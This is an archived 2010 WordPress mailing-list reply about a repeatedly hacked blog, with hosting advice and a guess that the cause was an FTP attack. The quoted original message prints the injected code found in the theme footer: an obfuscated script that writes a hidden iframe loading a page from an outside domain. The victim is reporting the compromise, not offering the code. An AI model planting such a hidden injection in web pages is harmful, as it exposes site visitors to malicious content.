[wp-hackers] wordpress theme script injection (hosted on dreamhost)

Vid Luther vid at zippykid.com
Sun Oct 31 15:17:30 UTC 2010


Mladen,
 Instead of switching platforms completely, I would recommend first
changing hosts, go with mediatemple, godaddy, rackspace, page.ly,
wpengine, my company, or even godaddy.. their UI sucks, but their phone
support is fairly decent.

As for the exploit, it may not be a wordpress exploit, but an ftp
attack, as it's just looking for filesystem paths and injecting to it.

I'm assuming by default theme footer, you meant twentyten theme, and
footer.php ?



Mladen Adamovic wrote:
> Hi guys,
>
> My wordpress software instance was repeatedly hacked ... running latest
> Wordpress source code and being hosted on Dreamhost.
>
> I don't know which exploit it did use and couldn't identify it, but it was
> adding the following code to my default theme footer.php:
>
> <script>
> enc =
> "%3Ciframe%20width%3D1%20height%3D1%20border%3D0%20frameborder%3D0%20src%3D%27http%3A//
> withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
> dec = unescape(enc);
> document.write(dec);
> </script>
>
> I think I'll have to migrate to Blogger, since I couldn't identify exploit
> it did use.
>
> I wanted to drop you an email anyhow since identifying exploits is
> important!
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers

-- 
Vid Luther
Founder
ZippyKid
http://zippykid.com/
210-789-0369


More information about the wp-hackers mailing list